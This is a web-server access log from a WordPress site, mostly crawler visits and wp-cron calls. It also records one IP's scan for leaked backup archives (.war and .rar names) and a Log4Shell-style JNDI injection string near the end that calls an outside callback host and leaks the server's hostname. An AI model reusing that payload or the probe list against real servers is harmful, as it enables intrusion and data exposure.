160.202.230.95 - - [23/Jul/2026:18:34:41 +0800] "GET /2021.rar HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:42 +0800] "GET /2020.rar HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:44 +0800] "GET /cqqizhou.com.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:45 +0800] "GET /cqqizhou.com.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:46 +0800] "GET /cqqizhou.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:48 +0800] "GET /.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:49 +0800] "GET /2026.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:50 +0800] "GET /web.war HTTP/1.1" 404 9495 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:51 +0800] "GET /1.war HTTP/1.1" 404 9495 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:53 +0800] "GET /assets.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:54 +0800] "GET /www.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:56 +0800] "GET /src.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:57 +0800] "GET /backup.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:34:58 +0800] "GET /bak.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:00 +0800] "GET /app.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:01 +0800] "GET /bin.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:02 +0800] "GET /index.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:04 +0800] "GET /public.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:05 +0800] "GET /file.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:06 +0800] "GET /backups.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:18:35:08 +0800] "POST /wp-cron.php?doing_wp_cron=1784802908.2264490127563476562500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.95 - - [23/Jul/2026:18:35:08 +0800] "GET /admin.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:10 +0800] "GET /ROOT.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:11 +0800] "GET /wwwroot.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:12 +0800] "GET /html.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:14 +0800] "GET /webapps.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
160.202.230.95 - - [23/Jul/2026:18:35:15 +0800] "GET /htdocs.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:17 +0800] "GET /ht_docs.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:18 +0800] "GET /resources.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:19 +0800] "GET /output.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:21 +0800] "GET /images.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:22 +0800] "GET /public_html.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:24 +0800] "GET /uploads.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:25 +0800] "GET /media.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:26 +0800] "GET /website.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:28 +0800] "GET /documents.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:29 +0800] "GET /site.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:30 +0800] "GET /api.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:32 +0800] "GET /test.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:33 +0800] "GET /config.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:34 +0800] "GET /old.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:36 +0800] "GET /Release.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:37 +0800] "GET /database.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:38 +0800] "GET /dump.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:40 +0800] "GET /db.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:41 +0800] "GET /inetpub.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:42 +0800] "GET /build.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:44 +0800] "GET /application.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:45 +0800] "GET /conf.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:46 +0800] "GET /target.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:48 +0800] "GET /upload.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:49 +0800] "GET /data.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:50 +0800] "GET /attachment.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:52 +0800] "GET /2026.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:53 +0800] "GET /2025.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:54 +0800] "GET /2024.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:55 +0800] "GET /2023.war HTTP/1.1" 404 9496 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:57 +0800] "GET /2022.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:58 +0800] "GET /2021.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:18:35:59 +0800] "GET /2020.war HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
36.133.115.36 - - [23/Jul/2026:18:36:09 +0800] "POST /wp-cron.php?doing_wp_cron=1784802969.4902989864349365234375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
195.182.16.23 - - [23/Jul/2026:18:36:09 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
217.103.6.233 - - [23/Jul/2026:18:39:20 +0800] "GET http://cqqizhou.com/wp-content/uploads/2025/12/1765248770-20251209104226_107_60.webp HTTP/1.1" 200 66916 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:18:51:11 +0800] "POST /wp-cron.php?doing_wp_cron=1784803871.1608679294586181640625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.164.192.151 - - [23/Jul/2026:18:51:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.164.192.151 - - [23/Jul/2026:18:51:15 +0800] "GET / HTTP/1.1" 200 35066 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
62.210.142.174 - - [23/Jul/2026:18:51:32 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
36.133.115.36 - - [23/Jul/2026:18:52:40 +0800] "POST /wp-cron.php?doing_wp_cron=1784803960.3051071166992187500000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
62.210.142.174 - - [23/Jul/2026:18:52:40 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
62.210.142.174 - - [23/Jul/2026:18:52:54 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
62.210.142.174 - - [23/Jul/2026:18:52:56 +0800] "GET / HTTP/1.1" 200 35067 "http://36.133.115.36/" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
36.133.115.36 - - [23/Jul/2026:18:55:43 +0800] "POST /wp-cron.php?doing_wp_cron=1784804143.8035690784454345703125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.159.149.56 - - [23/Jul/2026:18:55:43 +0800] "GET / HTTP/1.1" 200 35067 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:19:04:59 +0800] "POST /wp-cron.php?doing_wp_cron=1784804699.5569028854370117187500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.144.41 - - [23/Jul/2026:19:04:59 +0800] "GET /robots.txt HTTP/1.1" 200 190 "http://cqqizhou.com/robots.txt" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:19:06:11 +0800] "POST /wp-cron.php?doing_wp_cron=1784804771.4690940380096435546875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
146.56.199.139 - - [23/Jul/2026:19:06:11 +0800] "GET / HTTP/1.1" 200 35066 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:19:20:53 +0800] "POST /wp-cron.php?doing_wp_cron=1784805653.0519599914550781250000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
180.163.30.85 - - [23/Jul/2026:19:20:53 +0800] "GET /2418/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:19:24:44 +0800] "POST /wp-cron.php?doing_wp_cron=1784805884.4631869792938232421875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
110.249.201.49 - - [23/Jul/2026:19:24:44 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [23/Jul/2026:19:32:44 +0800] "POST /wp-cron.php?doing_wp_cron=1784806364.1005020141601562500000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
121.30.116.124 - - [23/Jul/2026:19:32:44 +0800] "GET /news/2373 HTTP/1.1" 200 26755 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:19:36:15 +0800] "POST /wp-cron.php?doing_wp_cron=1784806575.2919631004333496093750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.146.18 - - [23/Jul/2026:19:36:15 +0800] "GET /news/page/2 HTTP/1.1" 200 20518 "http://cqqizhou.com/news/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
43.160.241.129 - - [23/Jul/2026:19:37:01 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.160.241.129 - - [23/Jul/2026:19:37:03 +0800] "GET / HTTP/1.1" 200 35067 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.119.140.169 - - [23/Jul/2026:19:52:09 +0800] "GET /wp-content/uploads/2026/03/1772790943-5Article_images_W900px.webp HTTP/1.1" 200 57476 "http://cqqizhou.com/news/2518" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.132.85 - - [23/Jul/2026:19:53:30 +0800] "GET /wp-content/uploads/2025/12/1766647829-Article_images_202512251.webp HTTP/1.1" 200 53246 "http://cqqizhou.com/2388/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.202 - - [23/Jul/2026:19:54:53 +0800] "GET /wp-content/uploads/2025/07/1750649212-qizhou1920x1080_10.webp HTTP/1.1" 200 143362 "http://cqqizhou.com/about/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.138.179 - - [23/Jul/2026:19:56:17 +0800] "GET /wp-content/uploads/2025/07/1750649189-qizhou1920x1080_4.webp HTTP/1.1" 200 174962 "http://cqqizhou.com/about/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:19:59:04 +0800] "POST /wp-cron.php?doing_wp_cron=1784807944.9364190101623535156250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.132.85 - - [23/Jul/2026:19:59:04 +0800] "GET /news/portfolio HTTP/1.1" 200 17646 "http://cqqizhou.com/news/portfolio/duplex-stainless-steel" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:20:00:33 +0800] "POST /wp-cron.php?doing_wp_cron=1784808033.2178590297698974609375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.146.18 - - [23/Jul/2026:20:00:33 +0800] "GET /news/2585 HTTP/1.1" 200 20699 "http://cqqizhou.com/news/2440" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:20:01:53 +0800] "POST /wp-cron.php?doing_wp_cron=1784808113.1658439636230468750000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.146.18 - - [23/Jul/2026:20:01:53 +0800] "GET /news/2535 HTTP/1.1" 200 20016 "http://cqqizhou.com/work-safety" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
122.8.46.160 - - [23/Jul/2026:20:02:20 +0800] "GET /about HTTP/1.1" 200 25059 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
36.133.115.36 - - [23/Jul/2026:20:04:39 +0800] "POST /wp-cron.php?doing_wp_cron=1784808279.0004200935363769531250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.138.179 - - [23/Jul/2026:20:04:39 +0800] "GET /news/ HTTP/1.1" 301 5 "http://cqqizhou.com/2418/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.138.179 - - [23/Jul/2026:20:04:41 +0800] "GET /news HTTP/1.1" 200 20054 "http://cqqizhou.com/2418/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:20:06:02 +0800] "POST /wp-cron.php?doing_wp_cron=1784808362.9065389633178710937500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
114.119.140.169 - - [23/Jul/2026:20:06:02 +0800] "GET /media HTTP/1.1" 200 26497 "http://cqqizhou.com/services/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [23/Jul/2026:20:06:59 +0800] "POST /wp-cron.php?doing_wp_cron=1784808419.7728719711303710937500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
5.61.209.44 - - [23/Jul/2026:20:06:59 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Jul/2026:20:10:07 +0800] "POST /wp-cron.php?doing_wp_cron=1784808607.6811239719390869140625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
125.76.242.4 - - [23/Jul/2026:20:10:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:20:12:26 +0800] "POST /wp-cron.php?doing_wp_cron=1784808746.5988318920135498046875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
39.172.179.108 - - [23/Jul/2026:20:12:26 +0800] "GET / HTTP/1.1" 301 5 "-" "ZTE/1.0.6"
36.133.115.36 - - [23/Jul/2026:20:17:38 +0800] "POST /wp-cron.php?doing_wp_cron=1784809058.4215309619903564453125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.119.71.9 - - [23/Jul/2026:20:17:39 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
36.133.115.36 - - [23/Jul/2026:20:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1784809528.4196538925170898437500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.95 - - [23/Jul/2026:20:25:28 +0800] "GET /?x=${jndi:ldap://${:-253}${:-958}.${hostName}.uri.d9guf7henn3kn1fujvg04kbe96ap5urgq.oast.live/a} HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:20:25:30 +0800] "POST /wp-cron.php?doing_wp_cron=1784809530.3179121017456054687500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
61.142.42.201 - - [23/Jul/2026:20:25:30 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
